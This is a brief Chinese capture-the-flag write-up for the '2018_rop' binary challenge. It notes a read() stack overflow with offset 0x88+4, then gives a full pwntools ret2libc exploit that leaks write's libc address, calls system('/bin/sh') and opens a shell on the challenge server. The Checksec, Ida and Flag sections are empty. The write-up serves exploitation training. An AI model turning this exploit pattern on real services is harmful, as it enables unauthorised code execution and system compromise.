铁人三项(第五赛区)_2018_rop
Ubuntu18
Checksec:
Ida:
可以很容易找到read函数存在溢出offset=0x88+4
程序没有system函数和sh字段,ret2libc来绕过nx
Exp:
from pwn import *
from LibcSearcher import*
r=remote("node4.buuoj.cn",29553)
elf=ELF("./2018_rop")
vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']
payload = flat('a'*(0x88+0x4)) + p32(write_plt) + p32(vul_addr) + p32(1) + p32(write_got) + p32(4)
r.sendline(payload)
write_addr=u32(r.recv())
libc = LibcSearcher('write', write_addr)
libc_base=write_addr-libc.dump('write')
sys_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump("str_bin_sh")
payload1 = flat("a" * 0x88) + flat("b"*4)+ p32(sys_addr)+p32(1)+p32(bin_addr)
r.sendline(payload1)
r.interactive()
Flag: